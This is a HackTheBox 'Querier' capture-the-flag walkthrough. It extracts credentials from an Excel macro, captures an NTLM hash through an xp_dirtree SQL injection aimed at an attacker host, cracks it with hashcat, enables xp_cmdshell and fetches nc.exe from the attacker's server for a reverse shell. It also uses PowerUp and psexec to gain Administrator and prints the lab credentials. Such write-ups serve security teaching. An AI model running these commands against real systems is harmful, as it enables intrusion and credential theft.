HacktheBox Querier: Walkthrough



Nmap

As always, we start with nmap to scan for open ports and services:

Samba Enumeration

The only share I could access anonymously was the Reports share:

In the share there is one file, “Currency Volume Report.xlsm”. I downloaded it to my system and ran binwalk on it:

Inside “Currency Volume Report.xlsm” there are many embedded files (an .xlsm is a zip archive); one of them is “vbaProject.bin”.

Running strings on vbaProject.bin reveals the username “reporting” and the password “PcwTWTHRwryjc$c6”.
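A small Python audit script, added here as an example rather than code from the walkthrough, that does what binwalk and strings did above: open the .xlsm as the zip it is, pull out any vbaProject.bin, and flag printable strings that look like hard-coded credential assignments. The sample workbook, its paths and its credential literals are constructed inline and are not the real report from the share.

```python
from __future__ import annotations
import io
import re
import zipfile

# Constructed stand-in for the workbook from the share: a minimal OOXML zip with an
# embedded macro binary. The credential literals are made up for this example.
def build_sample_xlsm() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/vbaProject.bin",
                    b"\x00\x01\x02Uid=reporting;\x00\x00\x03Pwd=Example$Pass1;\x00\xff")
    return buf.getvalue()


def extract_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """What `strings` does: runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def find_macro_binaries(xlsm_bytes: bytes) -> dict[str, bytes]:
    """An .xlsm is a zip; return every vbaProject.bin inside it, keyed by path."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith("vbaproject.bin"):
                found[name] = zf.read(name)
    return found


# Key names that commonly carry hard-coded credentials in connection strings.
CRED_HINT = re.compile(r"\b(password|pwd|pw|uid|user(?: ?id)?|id)\s*=", re.IGNORECASE)


def audit_document(xlsm_bytes: bytes) -> list[tuple[str, str]]:
    """(path, string) pairs from macro binaries that look like credential assignments."""
    hits = []
    for path, blob in find_macro_binaries(xlsm_bytes).items():
        for s in extract_strings(blob):
            if CRED_HINT.search(s):
                hits.append((path, s))
    return hits


if __name__ == "__main__":
    for path, s in audit_document(build_sample_xlsm()):
        print(f"{path}: {s}")
```

Real VBA module streams hold compressed source, so a strings pass can miss literals that olevba from oletools would decompress; this script checks only the printable runs, as the walkthrough did.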

Now the main question is where to use those creds.

From the nmap report we also have MSSQL running on the box.

Command: mssqlclient.py -windows-auth -p 1433 10.10.10.125/Reporting:PcwTWTHRwryjc\$c6@10.10.10.125

To connect to MSSQL you must have Impacket installed on your system.

Gathering hash

I could not do much from MSSQL: I tried xp_cmdshell but did not have permission to run it, so I went for hash capturing instead.

First, start Responder:

Command: responder -I tun0 -v

Now, in the SQL session:

Command: ;declare @q varchar(200);set @q='\\10.10.14.170\ANYTHING'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --

Back in Responder:

Cracking the hash with hashcat

Command : hashcat -m 5600 crackme -o cracked.hash /usr/share/wordlists/rockyou.txt

username:mssql-svc
password:corporate568

Using these credentials on MSSQL again:

After connecting, I first enabled xp_cmdshell and then executed commands through it.

Command: mssqlclient.py -windows-auth -p 1433 10.10.10.125/mssql-svc:corporate568@10.10.10.125

Command: enable_xp_cmdshell

Command: xp_cmdshell "net users"

Alright, I can now run my commands from here.

Taking a shell as mssql-svc

First I started my Python HTTP server on port 80, then transferred nc.exe to the Windows box using PowerShell:

Command: xp_cmdshell "powershell Invoke-WebRequest -Uri 10.10.14.170/nc.exe -OutFile C:\Users\mssql-svc\downloads\nc.exe"

The request hit my server, which means the file was downloaded. Now I run nc.exe to get a reverse shell.

Reading Flag

Privilege Escalation

After spending some time on the box, I ran PowerUp to see if it could give me some juicy information.

PowerUp link: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

I got the Administrator credentials from the PowerUp output.

I used psexec.py from Impacket to log in as Administrator and obtain the root.txt flag.

Command: psexec.py Administrator@10.10.10.125

Reading the root flag
